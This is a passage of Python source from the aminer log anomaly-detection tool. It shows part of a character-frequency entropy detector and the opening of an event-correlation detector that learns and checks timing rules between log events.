220], ["N", 497], ["Q", 2], ["P", 2116], ["S", 220], ["R", 481], ["U", 44], ["T", 292], ["W", 18], ["V", 78], ["Y", 66], ["X", 6], ["Z", 2], ["a", 2], ["c", 208], ["b", 496], ["e", 2], ["d", 372], ["g", 352], ["f", 1144], ["i", 66], ["h", 554], ["k", 64], ["j", 4], ["m", 1358], ["l", 3042], ["o", 140], ["n", 12454], ["q", 4], ["p", 230], ["s", 2898], ["r", 1643], ["u", 754], ["t", 3060], ["w", 48], ["v", 60], ["y", 30], ["x", 2], ["z", 30]]], ["E", [["!", 20], [" ", 1253], ["\"", 2], ["'", 18], ["*", 2], ["-", 14], [",", 30], [".", 100], [":", 8], ["?", 4], ["A", 176], ["C", 152], ["B", 30], ["E", 92], ["D", 166], ["G", 32], ["F", 34], ["I", 60], ["H", 6], ["K", 8], ["M", 80], ["L", 142], ["O", 14], ["N", 490], ["Q", 6], ["P", 124], ["S", 360], ["R", 730], ["U", 18], ["T", 184], ["W", 90], ["V", 102], ["Y", 34], ["X", 64], ["a", 450], ["c", 46], ["b", 14], ["d", 90], ["g", 62], ["f", 20], ["i", 64], ["h", 58], ["k", 6], ["m", 1500], ["l", 226], ["o", 4], ["n", 1398], ["q", 20], ["p", 138], ["s", 148], ["r", 118], ["u", 358], ["t", 98], ["v", 1326], ["y", 70], ["x", 298], ["z", 2], ["}", 2]]], ["I", [["!", 34], [" ", 40514], ["\"", 4], ["'", 2748], ["-", 52], [",", 526], [".", 576], [";", 42], [":", 6], ["?", 88], ["A", 76], ["C", 182], ["B", 47], ["E", 82], ["D", 78], ["G", 140], ["F", 78], ["I", 1054], ["K", 12], ["M", 76], ["L", 150], ["O", 134], ["N", 704], ["Q", 4], ["P", 18], ["S", 277], ["R", 122], ["U", 2], ["T", 378], ["V", 298], ["X", 156], ["Z", 8], ["_", 46], ["a", 2], ["c", 146], ["b", 10], ["d", 16], ["g", 48], ["f", 1944], ["m", 196], ["l", 216], ["o", 30], ["n", 5298], ["p", 28], ["s", 930], ["r", 122], ["t", 8656], ["v", 100], ["x", 2], ["z", 2]]], ["M", [["!", 4], [" ", 68], ["\"", 2], ["'", 12], ["-", 4], [",", 12], ["/", 8], [".", 1208], [":", 2], ["A", 346], ["C", 28], ["B", 34], ["E", 243], ["D", 6], ["G", 12], ["I", 130], ["M", 24], ["L", 2], ["O", 117], ["N", 16], ["P", 50], ["S", 26], ["R", 8], ["U", 28], ["W", 6], ["Y", 24], ["a", 8688], ["c", 378], ["e", 1576], ["f", 2], ["i", 2158], ["o", 4266], ["s", 2], ["r", 2578], ["u", 518], ["y", 1492]]], ["Q", [["U", 48], ["C", 2], ["u", 494], [".", 4]]], ["U", [["!", 2], [" ", 106], ["'", 6], [",", 2], [".", 10], ["A", 16], ["C", 48], ["B", 24], ["E", 54], ["D", 44], ["G", 12], ["F", 6], ["I", 12], ["K", 2], ["M", 60], ["L", 68], ["N", 116], ["P", 26], ["S", 130], ["R", 182], ["U", 2], ["T", 156], ["V", 2], ["Z", 6], ["c", 2], ["g", 12], ["h", 34], ["k", 4], ["m", 16], ["l", 30], ["n", 859], ["p", 360], ["s", 32], ["r", 68], ["t", 50], ["v", 16]]], ["Y", [["!", 4], [" ", 260], ["\"", 2], ["'", 4], ["-", 68], [",", 10], [".", 22], [";", 2], ["A", 2], ["B", 2], ["E", 26], ["L", 4], ["O", 112], ["S", 26], ["R", 4], ["T", 2], ["a", 122], ["c", 2], ["e", 1328], ["i", 10], ["o", 3878], ["s", 10], ["u", 26], ["v", 8]]], ["]", [["!", 2], [" ", 322], ["J", 2], ["-", 2], [",", 44], [".", 14], [";", 24], [">", 2]]], ["a", [["!", 310], [" ", 65518], ["\"", 24], ["'", 716], [")", 20], ["*", 1], ["-", 724], [",", 2766], [".", 1558], ["1", 2], [";", 152], [":", 30], ["?", 144], [">", 2], ["S", 2], ["_", 6], ["a", 122], ["`", 6], ["c", 35608], ["b", 19042], ["e", 752], ["d", 56288], ["g", 18377], ["f", 7666], ["i", 47228], ["h", 1140], ["k", 13604], ["j", 480], ["m", 24754], ["l", 68865], ["o", 314], ["n", 216874], ["q", 102], ["p", 18548], ["s", 105951], ["r", 97182], ["u", 12725], ["t", 135418], ["w", 10880], ["v", 25744], ["y", 29029], ["x", 666], ["z", 1906], ["}", 2]]], ["e", [["!", 3010], [" ", 487805], ["\"", 166], ["'", 4249], [")", 336], ["*", 10], ["-", 4298], [",", 40540], [".", 24278], [";", 3704], [":", 890], ["?", 2866], [">", 78], ["B", 2], ["I", 2], ["S", 2], ["[", 6], ["]", 18], ["_", 42], ["a", 79086], ["`", 2], ["c", 27918], ["b", 1598], ["e", 45884], ["d", 142368], ["g", 8394], ["f", 13916], ["i", 18692], ["h", 2842], ["k", 1590], ["j", 380], ["m", 31126], ["l", 54118], ["o", 4898], ["n", 129345], ["q", 1706], ["p", 17078], ["s", 100714], ["r", 205409], ["u", 2658], ["t", 41944], ["w", 11422], ["v", 24561], ["y", 23800], ["x", 14052], ["z", 560], ["}", 4]]], ["i", [["!", 50], [" ", 1222], ["\"", 2], ["'", 184], [")", 4], ["*", 2], ["-", 384], [",", 450], [".", 254], [";", 14], [":", 6], ["?", 14], ["@", 2], ["G", 2], ["Y", 2], ["]", 2], ["_", 8], ["a", 10716], ["c", 45183], ["b", 6986], ["e", 33445], ["d", 40015], ["g", 26388], ["f", 17002], ["i", 24], ["h", 72], ["k", 7006], ["j", 18], ["m", 40198], ["l", 43870], ["o", 33038], ["n", 232657], ["q", 394], ["p", 5884], ["s", 107323], ["r", 32008], ["u", 1844], ["t", 102683], ["w", 38], ["v", 16166], ["y", 2], ["x", 2074], ["z", 2892]]], ["m", [["!", 462], [" ", 35852], ["\"", 24], ["'", 294], [")", 58], ["-", 610], [",", 7564], [".", 6290], ["1", 2], [";", 758], [":", 298], ["?", 470], [">", 22], ["]", 2], ["a", 45673], ["c", 96], ["b", 7420], ["e", 83120], ["d", 36], ["g", 4], ["f", 768], ["i", 24836], ["h", 10], ["k", 22], ["m", 5770], ["l", 522], ["o", 32940], ["n", 1218], ["p", 15046], ["s", 8640], ["r", 202], ["u", 10278], ["t", 200], ["w", 24], ["y", 17480]]], ["q", [["a", 2], [" ", 2], ["u", 12073], [",", 2], ["'", 2]]], ["u", [["!", 428], [" ", 17752], ["\"", 16], ["'", 1182], [")", 6], ["-", 186], [",", 1924], [".", 1140], [";", 124], [":", 18], ["?", 428], ["S", 12], ["T", 2], ["_", 2], ["a", 6632], ["c", 12934], ["b", 5730], ["e", 10797], ["d", 6988], ["g", 18286], ["f", 2056], ["i", 9148], ["h", 30], ["k", 496], ["j", 84], ["m", 8440], ["l", 37068], ["o", 708], ["n", 43221], ["q", 64], ["p", 17232], ["s", 44836], ["r", 48568], ["u", 18], ["t", 49162], ["w", 10], ["v", 428], ["y", 210], ["x", 498], ["z", 722]]], ["y", [["!", 1032], [" ", 118640], ["\"", 62], ["'", 1440], [")", 154], ["-", 2010], [",", 18388], [".", 10860], [";", 1366], [":", 466], ["?", 946], [">", 26], ["]", 2], ["_", 4], ["a", 2624], ["`", 2], ["c", 242], ["b", 640], ["e", 11272], ["d", 206], ["g", 138], ["f", 198], ["i", 4422], ["h", 84], ["k", 76], ["m", 714], ["l", 818], ["o", 28106], ["n", 212], ["p", 410], ["s", 8723], ["r", 738], ["u", 58], ["t", 3028], ["w", 464], ["v", 110], ["x", 14], ["z", 40]]], ["}", [[" ", 6], [",", 2]]]]] # noqa: E501 for elem in default_f[2]: first_char = int.from_bytes(bytes(elem[0], AminerConfig.ENCODING), "big") second_char_list = elem[1] self.freq[first_char] = {} for second_char_elem in second_char_list: second_char = int.from_bytes(bytes(second_char_elem[0], AminerConfig.ENCODING), "big") frequency = second_char_elem[1] self.freq[first_char][second_char] = frequency # Load frequency table from persisted data. Note that this adds to entries in the default frequency table if used. self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) self.load_persistence_data() def receive_atom(self, log_atom): """Receive a log atom from a source.""" for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return False self.log_total += 1 if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time parser_match = log_atom.parser_match if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False # Skip atom when ignore paths in atom or constraint paths not in atom. all_paths_set = set(parser_match.get_match_dictionary().keys()) if len(all_paths_set.intersection(self.ignore_list)) > 0 \ or len(all_paths_set.intersection(self.constraint_list)) != len(self.constraint_list): return False # Store all values from target target_path_list in a list. values = [] all_values_none = True for path in self.target_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: value = match.match_object if not isinstance(match.match_object, bytes): value = str(match.match_object).encode(AminerConfig.ENCODING) if value is not None: all_values_none = False values.append(value) if all_values_none is True: return False for value in values: probs = [] # Iterate over all characters (+ virtual characters before and after value) # and check occurrence frequencies of ith and (i+1)th character for i in range(-1, len(value)): # Use -1 as placeholder for character before first actual character of value first_char = -1 if i != -1: first_char = value[i] # Use -1 as placeholder for character after last actual character of value second_char = -1 if i != len(value) - 1: second_char = value[i + 1] prob = 0 if first_char in self.freq and second_char in self.freq[first_char]: prob = self.freq[first_char][second_char] / self.total_freq[first_char] probs.append(prob) critical_val = sum(probs) / len(probs) if critical_val < self.prob_thresh: try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) if self.output_logline: original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [log_atom.parser_match.match_element.annotate_match("") + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [data] analysis_component = {"AffectedLogAtomPaths": self.target_path_list, "AffectedLogAtomValues": [value.decode(AminerConfig.ENCODING)], "CriticalValue": critical_val, "ProbabilityThreshold": self.prob_thresh} event_data = {"AnalysisComponent": analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "Value entropy anomaly detected", sorted_log_lines, event_data, log_atom, self) # Extend frequency table if learn mode is active. if self.learn_mode is True: for value in values: if self.skip_repetitions is True: # Do not consider repeating values multiple times for extending frequency table to avoid distortions. if value in self.value_set: continue self.value_set.add(value) for i in range(-1, len(value)): first_char = -1 if i != -1: first_char = value[i] second_char = -1 if i != len(value) - 1: second_char = value[i + 1] if first_char in self.freq: self.total_freq[first_char] += 1 if second_char in self.freq[first_char]: self.freq[first_char][second_char] += 1 else: self.freq[first_char][second_char] = 1 else: self.total_freq[first_char] = 1 self.freq[first_char] = {} self.freq[first_char][second_char] = 1 if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time self.log_success += 1 return True def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" lst = [] for first_char, second_char_elem in self.freq.items(): sublst = [] for second_char, frequency in second_char_elem.items(): sublst.append([second_char, frequency]) lst.append([first_char, sublst]) PersistenceUtil.store_json(self.persistence_file_name, lst) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def load_persistence_data(self): """Load the persistence data from storage.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: for elem in persistence_data: first_char = elem[0] second_char_list = elem[1] if first_char not in self.freq: self.freq[first_char] = {} for second_char_elem in second_char_list: second_char = second_char_elem[0] frequency = second_char_elem[1] if second_char not in self.freq[first_char]: self.freq[first_char][second_char] = 0 self.freq[first_char][second_char] += frequency for first_char, second_char_dict in self.freq.items(): self.total_freq[first_char] = sum(second_char_dict.values()) def allowlist_event(self, event_type, event_data, allowlisting_data): """Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = "Allowlisting data not understood by this detector" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.constraint_list: self.constraint_list.append(event_data) return f"Allowlisted path {event_data} in {event_type}." def blocklist_event(self, event_type, event_data, blocklisting_data): """Blocklist an event generated by this source using the information emitted when generating the event. @return a message with information about blocklisting @throws Exception when blocklisting of this special event using given blocklisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if blocklisting_data is not None: msg = "Blocklisting data not understood by this detector" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.ignore_list: self.ignore_list.append(event_data) return f"Blocklisted path {event_data} in {event_type}." def log_statistics(self, component_name): """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info("'%s' processed %d out of %d log atoms successfully in the last 60 minutes.", component_name, self.log_success, self.log_total) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info("'%s' processed %d out of %d log atoms successfully in the last 60 minutes.", component_name, self.log_success, self.log_total) self.log_success = 0 self.log_total = 0 EventCorrelationDetector.py000066400000000000000000001501131500476301700362770ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines an evaluator and generator for event rules. The overall idea of generation is 1) For each processed event A, randomly select another event B occurring within queue_delta_time. 2) If B chronologically occurs after A, create the hypothesis A => B (observing event A implies that event B must be observed within current_time+queue_delta_time). If B chronologically occurs before A, create the hypothesis B <= A (observing event A implies that event B must be observed within currentTime-queueDeltaTime). 3) Observe for a long time (max_observations) whether the hypothesis holds. 4) If the hypothesis holds, transform it to a rule. Otherwise, discard the hypothesis. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from collections import deque import random import math import logging from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, \ STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class EventCorrelationDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface, PersistableComponentInterface): """This class tries to find time correlation patterns between different log atom events.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, target_path_list=None, max_hypotheses=1000, hypothesis_max_delta_time=5.0, generation_probability=1.0, generation_factor=1.0, max_observations=500, p0=0.9, alpha=0.05, candidates_size=10, hypotheses_eval_delta_time=120.0, delta_time_to_discard_hypothesis=180.0, check_rules_flag=False, learn_mode=True, ignore_list=None, persistence_id="Default", output_logline=True, constraint_list=None, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param max_hypotheses maximum amount of hypotheses and rules hold in memory. @param hypothesis_max_delta_time time span of events considered for hypothesis generation. @param generation_probability probability in [0, 1] that currently processed log line is considered for hypothesis with each of the candidates. @param generation_factor likelihood in [0, 1] that currently processed log line is added to the set of candidates for hypothesis generation. @param max_observations maximum amount of evaluations before hypothesis is transformed into a rule or discarded or rule is evaluated. @param p0 expected value for hypothesis evaluation distribution. @param alpha confidence value for hypothesis evaluation. @param candidates_size maximum number of stored candidates used for hypothesis generation. @param hypotheses_eval_delta_time duration between hypothesis evaluation phases that remove old hypotheses that are likely to remain unused. @param delta_time_to_discard_hypothesis time span required for old hypotheses to be discarded. @param check_rules_flag specifies whether existing rules are evaluated. @param learn_mode specifies whether new hypotheses are generated. @param ignore_list list of paths that are not considered for correlation, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable. @param persistence_id name of persistence file. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param constraint_list list of paths that have to be present in the log atom to be analyzed. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( mutable_default_args=["target_path_list", "ignore_list", "constraint_list", "log_resource_ignore_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, target_path_list=target_path_list, max_hypotheses=max_hypotheses, hypothesis_max_delta_time=hypothesis_max_delta_time, generation_probability=generation_probability, generation_factor=generation_factor, max_observations=max_observations, p0=p0, alpha=alpha, candidates_size=candidates_size, hypotheses_eval_delta_time=hypotheses_eval_delta_time, delta_time_to_discard_hypothesis=delta_time_to_discard_hypothesis, check_rules_flag=check_rules_flag, learn_mode=learn_mode, ignore_list=ignore_list, persistence_id=persistence_id, output_logline=output_logline, constraint_list=constraint_list, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list ) self.last_unhandled_match = None self.total_records = 0 self.forward_hypotheses = {} self.back_hypotheses = {} self.forward_hypotheses_inv = {} self.back_hypotheses_inv = {} self.last_hypotheses_eval_timestamp = -1.0 self.forward_rule_queue = deque([]) self.back_rule_queue = deque([]) self.forward_hypotheses_queue = deque([]) self.back_hypotheses_queue = deque([]) self.hypothesis_candidates = deque([]) self.sum_unstable_unknown_hypotheses = 0 self.last_event_occurrence = {} self.min_eval_true_dict = {} self.min_eval_true_dict_max_size = 1000 self.sample_events = {} self.back_rules = {} self.forward_rules = {} self.back_rules_inv = {} self.forward_rules_inv = {} # Compute the initial minimum amount of positive evaluations for hypotheses to become rules. # For rules, this value can be different and will be computed based on the sample observations. self.min_eval_true = self.get_min_eval_true(self.max_observations, self.p0, self.alpha) self.log_forward_rules_learned = 0 self.log_back_rules_learned = 0 self.log_new_forward_rules = [] self.log_new_back_rules = [] self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) self.load_persistence_data() def get_min_eval_true(self, max_observations, p0, alpha): """Compute the critical value (minimal amount of true evaluations) for a hypothesis. The form of the hypothesis is implies with at least probability p0 to be accepted. This method tries to be efficient by - Storing already computed critical values in a dictionary - Swapping (1 - p0) and p0 and replace alpha with (1 - alpha) to reduce loops """ if (max_observations, p0, alpha) in self.min_eval_true_dict: return self.min_eval_true_dict[(max_observations, p0, alpha)] sum1 = 0.0 max_observations_factorial = math.factorial(max_observations) i_factorial = 1 for i in range(max_observations + 1): i_factorial = i_factorial * max(i, 1) # No float conversion possible for huge numbers; use integer division. sum1 = sum1 + max_observations_factorial / (i_factorial * math.factorial(max_observations - i)) * ((1 - p0) ** i) * ( p0 ** (max_observations - i)) if sum1 > (1 - alpha): if len(self.min_eval_true_dict) <= self.min_eval_true_dict_max_size: # Store common values for fast retrieval self.min_eval_true_dict[(max_observations, p0, alpha)] = max_observations - i return max_observations - i return max_observations def receive_atom(self, log_atom): """Receive a log atom from a source.""" for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return False self.log_total += 1 if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False parser_match = log_atom.parser_match self.total_records += 1 # Skip paths from ignore_list. for ignore_path in self.ignore_list: if ignore_path in parser_match.get_match_dictionary(): return False if self.target_path_list is None or len(self.target_path_list) == 0: # Event is defined by the full path of log atom. constraint_path_flag = False for constraint_path in self.constraint_list: if parser_match.get_match_dictionary().get(constraint_path) is not None: constraint_path_flag = True break if not constraint_path_flag and self.constraint_list != []: return False log_event = tuple(parser_match.get_match_dictionary()) else: # Event is defined by value combos in target_path_list values = [] all_values_none = True for path in self.target_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: if isinstance(match.match_object, bytes): value = match.match_object.decode(AminerConfig.ENCODING) else: value = str(match.match_object) if value is not None: all_values_none = False values.append(value) if all_values_none is True: return False log_event = tuple(values) # Store last seen sample event to improve output. self.sample_events[log_event] = log_atom.raw_data if self.check_rules_flag: # Only check rules without generating new hypotheses. # Trigger implication A => B when A occurs. if log_event in self.forward_rules: for rule in self.forward_rules[log_event]: rule.rule_trigger_timestamps.append(log_atom.atom_time) self.forward_rule_queue.append(rule) # Resolve triggered implication A => B when B occurs. if log_event in self.forward_rules_inv: for rule in self.forward_rules_inv[log_event]: # Find first non-observed trigger timestamp trigger_timestamp_index = -1 for trigger_timestamp in rule.rule_trigger_timestamps: trigger_timestamp_index += 1 if trigger_timestamp != "obs": break if trigger_timestamp_index != -1 and \ rule.rule_trigger_timestamps[trigger_timestamp_index] != "obs" and \ rule.rule_trigger_timestamps[trigger_timestamp_index] >= log_atom.atom_time - self.hypothesis_max_delta_time: # Implication was triggered; append positive evaluation and mark as seen. rule.add_rule_observation(1) rule.rule_trigger_timestamps[trigger_timestamp_index] = "obs" # Clean up triggered/resolved implications. while len(self.forward_rule_queue) > 0: rule = self.forward_rule_queue[0] if len(rule.rule_trigger_timestamps) == 0: # Triggered timestamp was already deleted somewhere else. self.forward_rule_queue.popleft() continue if rule.rule_trigger_timestamps[0] == "obs": # Remove triggered timestamp. rule.rule_trigger_timestamps.popleft() self.forward_rule_queue.popleft() continue if rule.rule_trigger_timestamps[0] < log_atom.atom_time - self.hypothesis_max_delta_time: # Too much time has elapsed; append negative evaluation. rule.add_rule_observation(0) rule.rule_trigger_timestamps.popleft() self.forward_rule_queue.popleft() if not rule.evaluate_rule(): if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) tmp_string = f"Rule: {str(rule.trigger_event)} -> {str(rule.implied_event)}\n Expected: " \ f"{str(rule.min_eval_true)}/{str(rule.max_observations)}\n Observed: " \ f"{str(sum(rule.rule_observations))}/{str(len(rule.rule_observations))}" if self.output_logline: sorted_log_lines = [tmp_string + "\n" + original_log_line_prefix + data] else: sorted_log_lines = [tmp_string + data] for listener in self.anomaly_event_handlers: implied_event = None trigger_event = None if rule.implied_event in self.sample_events: implied_event = self.sample_events[rule.implied_event] if rule.trigger_event in self.sample_events: trigger_event = self.sample_events[rule.trigger_event] listener.receive_event( "analysis.EventCorrelationDetector", f"Correlation rule violated! Event {repr(implied_event)} is missing, but should follow event " f"{repr(trigger_event)}", sorted_log_lines, {"RuleInfo": {"Rule": str(rule.trigger_event) + "->" + str(rule.implied_event), "Expected": str(rule.min_eval_true) + "/" + str(rule.max_observations), "Observed": str(sum(rule.rule_observations)) + "/" + str(len(rule.rule_observations))}}, log_atom, self) rule.rule_observations = deque([]) continue break # Trigger implication B <= A when B occurs. if log_event in self.back_rules_inv: for rule in self.back_rules_inv[log_event]: rule.rule_trigger_timestamps.append(log_atom.atom_time) self.back_rule_queue.append(rule) # Resolve triggered implication B <= A when A occurs. if log_event in self.back_rules: for rule in self.back_rules[log_event]: # Find first non-observed trigger timestamp trigger_timestamp_index = -1 for trigger_timestamp in rule.rule_trigger_timestamps: trigger_timestamp_index += 1 if trigger_timestamp != "obs": break if trigger_timestamp_index != -1 and \ rule.rule_trigger_timestamps[trigger_timestamp_index] != "obs" and \ rule.rule_trigger_timestamps[trigger_timestamp_index] >= log_atom.atom_time - self.hypothesis_max_delta_time: rule.add_rule_observation(1) rule.rule_trigger_timestamps[trigger_timestamp_index] = "obs" else: rule.add_rule_observation(0) if not rule.evaluate_rule(): if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max( self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) tmp_string = f"Rule: {str(rule.implied_event)} <- {str(rule.trigger_event)}\n Expected: " \ f"{str(rule.min_eval_true)}/{str(rule.max_observations)}\n Observed: " \ f"{str(sum(rule.rule_observations))}/{str(len(rule.rule_observations))}" if self.output_logline: sorted_log_lines = [tmp_string + "\n" + original_log_line_prefix + data] else: sorted_log_lines = [tmp_string + data] for listener in self.anomaly_event_handlers: implied_event = None trigger_event = None if rule.implied_event in self.sample_events: implied_event = self.sample_events[rule.implied_event] if rule.trigger_event in self.sample_events: trigger_event = self.sample_events[rule.trigger_event] listener.receive_event( "analysis.EventCorrelationDetector", f"Correlation rule violated! Event {repr(implied_event)} is missing, but should precede event " f"{repr(trigger_event)}", sorted_log_lines, {"RuleInfo": {"Rule": str(rule.implied_event) + "<-" + str(rule.trigger_event), "Expected": str(rule.min_eval_true) + "/" + str(rule.max_observations), "Observed": str(sum(rule.rule_observations)) + "/" + str(len(rule.rule_observations))}}, log_atom, self) rule.rule_observations = deque([]) # Clean up triggered/resolved implications. while len(self.back_rule_queue) > 0: rule = self.back_rule_queue[0] if len(rule.rule_trigger_timestamps) == 0: self.back_rule_queue.popleft() continue if rule.rule_trigger_timestamps[0] == "obs": rule.rule_trigger_timestamps.popleft() self.back_rule_queue.popleft() continue if rule.rule_trigger_timestamps[0] < log_atom.atom_time - self.hypothesis_max_delta_time: rule.rule_trigger_timestamps.popleft() self.back_rule_queue.popleft() continue break if self.learn_mode: # Generate new hypotheses and rules. # Keep track of event occurrences, relevant for removing old hypotheses. self.last_event_occurrence[log_event] = log_atom.atom_time # Trigger implication A => B when A occurs. if log_event in self.forward_hypotheses: for implication in self.forward_hypotheses[log_event]: if implication.stable == 0: implication.hypothesis_trigger_timestamps.append(log_atom.atom_time) self.forward_hypotheses_queue.append(implication) # Resolve triggered implication A => B when B occurs. if log_event in self.forward_hypotheses_inv: delete_hypotheses = [] for implication in self.forward_hypotheses_inv[log_event]: # Find first non-observed trigger timestamp trigger_timestamp_index = -1 for trigger_timestamp in implication.hypothesis_trigger_timestamps: trigger_timestamp_index += 1 if trigger_timestamp != "obs": break if trigger_timestamp_index != -1 and \ str(implication.hypothesis_trigger_timestamps[trigger_timestamp_index]) != "obs" and \ implication.hypothesis_trigger_timestamps[trigger_timestamp_index] >= log_atom.atom_time - \ self.hypothesis_max_delta_time and \ implication.stable == 0: implication.add_hypothesis_observation(1, log_atom.atom_time) # Mark this timestamp as observed implication.hypothesis_trigger_timestamps[trigger_timestamp_index] = "obs" # Since only true observations occur here, check for instability not necessary. if implication.compute_hypothesis_stability() == 1: # Update p and min_eval_true according to the results in the sample. p = implication.hypothesis_evaluated_true / implication.hypothesis_observations implication.min_eval_true = self.get_min_eval_true(self.max_observations, p, self.alpha) # Add hypothesis to rules. if implication.trigger_event in self.forward_rules: self.forward_rules[implication.trigger_event].append(implication) self.log_forward_rules_learned += 1 self.log_new_forward_rules.append(implication) else: self.forward_rules[implication.trigger_event] = [implication] self.log_forward_rules_learned += 1 self.log_new_forward_rules.append(implication) if implication.implied_event in self.forward_rules_inv: self.forward_rules_inv[implication.implied_event].append(implication) else: self.forward_rules_inv[implication.implied_event] = [implication] # Drop time stamps of previous observations, start new observations for rule. implication.hypothesis_trigger_timestamps.clear() self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses - 1 # Remove implication from list of hypotheses. self.forward_hypotheses[implication.trigger_event].remove(implication) delete_hypotheses.append(implication) for delete_hypothesis in delete_hypotheses: 